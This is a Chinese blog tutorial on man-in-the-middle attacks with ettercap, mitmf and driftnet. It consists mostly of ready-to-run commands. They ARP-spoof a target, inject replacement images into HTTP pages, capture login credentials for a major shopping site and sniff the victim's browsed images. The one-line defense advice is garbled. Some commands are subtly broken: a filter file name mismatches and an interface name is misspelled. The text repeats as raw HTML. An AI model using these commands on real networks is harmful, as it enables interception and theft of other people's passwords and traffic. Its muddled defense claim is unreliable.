中间人攻击在渗透测试中的利用

Author：逍遥子
发布时间：March 8, 2019
6520 views
One comment
1885 words
Categories：全部

工具介绍

ettercap
mitmtf
3070网卡（大力推荐）
ettercap进行中间人攻击
替换图片
先利用vim新建一个 kali.filter
写入下面代码并保存
```
if (ip.proto == TCP && tcp.dst == 80) {
 if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!"); 
    #note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
 }
}
if (ip.proto == TCP && tcp.src == 80) {
 replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
 replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
 msg("Filter Ran.\n");
}
```
将其转变为二进制文件
```
etterfilter kali.filter -o kali.ef
```
执行命令
```
ettercap -T -q -F ig.ef -M ARP /目标ip///
```
效果如下
mitmf操作
替换网页中的图片
首先在root下创建一个img的文件夹，在文件夹中放入图片。
执行命令
```
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/img
```
PS: 192.168.5.1 为路由器网关 192.168.5.202 为目标。
访问某宝效果如下：
获取某宝登录密码
```
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202
```
将所有的图片选择180°
```
python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet
```
其他命令可以参考官网，这里不在演示。
嗅探浏览的图片
在通过ettercap进行中间人攻击后，我们可以利用driftnet来获取对方浏览的图片。命令如下：
```
driftnet -i waln0
```
防御
可以在路由器防火墙中开启arp攻击，来防御中间人攻击。
mitmf安装
参考文章：

kali安装MITMF

Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用，并利用 beef 强大的 hook ...

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/825.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

Kali黑客笔记一键关注

Last modification：March 9, 2019

© Allow specification reprint

正在沿街乞讨中……

Leave a Comment Cancel reply

Comment *

Private comment

Name *

🎲

Email *

Site

One comment

GOOGLE.COM
March 9th, 2019 at 09:55 pm

我觉得还是好深奥，不过我是个小白

Reply

中间人攻击在渗透测试中的利用

逍遥子 • 2019 年 03 月 08 日

<h3>工具介绍</h3><ul><li>ettercap</li><li>mitmtf</li><li><p>3070网卡（大力推荐）</p><h3>ettercap进行中间人攻击</h3><h3>替换图片</h3><p>先利用<code>vim</code>新建一个<code> kali.filter</code><br>写入下面代码并保存</p><pre><code class="lang-shell">if (ip.proto == TCP &amp;&amp; tcp.dst == 80) {
 if (search(DATA.data, &quot;Accept-Encoding&quot;)) {
    replace(&quot;Accept-Encoding&quot;, &quot;Accept-Rubbish!&quot;); 
    #note: replacement string is same length as original string
    msg(&quot;zapped Accept-Encoding!\n&quot;);
 }
}
if (ip.proto == TCP &amp;&amp; tcp.src == 80) {
 replace(&quot;img src=&quot;, &quot;img src=\&quot;http://www.irongeek.com/images/jollypwn.png\&quot; &quot;);
 replace(&quot;IMG SRC=&quot;, &quot;img src=\&quot;http://www.irongeek.com/images/jollypwn.png\&quot; &quot;);
 msg(&quot;Filter Ran.\n&quot;);
}</code></pre><p>将其转变为二进制文件</p><pre><code class="lang-shell">etterfilter kali.filter -o kali.ef</code></pre><p>执行命令</p><pre><code class="lang-shell">ettercap -T -q -F ig.ef -M ARP /目标ip///</code></pre><p>效果如下<br><img src="https://blog.bbskali.cn/usr/uploads/2019/03/3406754093.png" alt="QQ截图20190308154552.png" title="QQ截图20190308154552.png"style=""></p><h3>mitmf操作</h3><h3>替换网页中的图片</h3><p>首先在<code>root</code>下创建一个<code>img</code>的文件夹，在文件夹中放入图片。<br>执行命令</p><pre><code class="lang-shell">python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/img</code></pre><p><code>PS:</code> 192.168.5.1 为路由器网关 192.168.5.202 为目标。<br>访问某宝效果如下：<br><img src="https://blog.bbskali.cn/usr/uploads/2019/03/193659815.png" alt="某宝效果" title="某宝效果"style=""></p><h3>获取某宝登录密码</h3><pre><code class="lang-shell">python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2019/03/4038785789.png" alt="登录密码" title="登录密码"style=""></p><h3>将所有的图片选择180°</h3><pre><code class="lang-shell">python mitmf.py -i wlan0 --spoof  --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2019/03/3332378769.png" alt="旋转" title="旋转"style=""><br>其他命令可以参考官网，这里不在演示。</p><h3>嗅探浏览的图片</h3><p>在通过<code>ettercap</code>进行中间人攻击后，我们可以利用<code>driftnet</code>来获取对方浏览的图片。命令如下：</p><pre><code class="lang-shell">driftnet -i waln0</code></pre><h3>防御</h3><p>可以在路由器防火墙中开启<code>arp</code>攻击，来防御中间人攻击。<br><img src="https://blog.bbskali.cn/usr/uploads/2019/03/299168633.png" alt="防御" title="防御"style=""></p><h3>mitmf安装</h3><p>参考文章：<br><div class="preview">
<div class="post-inser post box-shadow-wrap-normal">
<a href="https://blog.bbskali.cn/140.html" target="_blank" class="post_inser_a no-external-link no-underline-link">
<div class="inner-image bg" style="background-image: url(https://bbskali.cn/data/attachment/forum/201805/11/114202mlqnpyy9k918gppg.png);background-size: cover;"></div>

<div class="inner-content" >
<p class="inser-title">kali安装MITMF</p>
<div class="inster-summary text-muted">
Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用，并利用 beef 强大的 hook ...
</div>
</div>
</a>

</div>

</div></p></li></ul><hr class="content-copyright" style="margin-top:50px" /><div class="post-copyright" style="font-style:normal"> <p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：<a class="content-copyright" href="https://blog.bbskali.cn/825.html">https://blog.bbskali.cn/825.html</a></p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>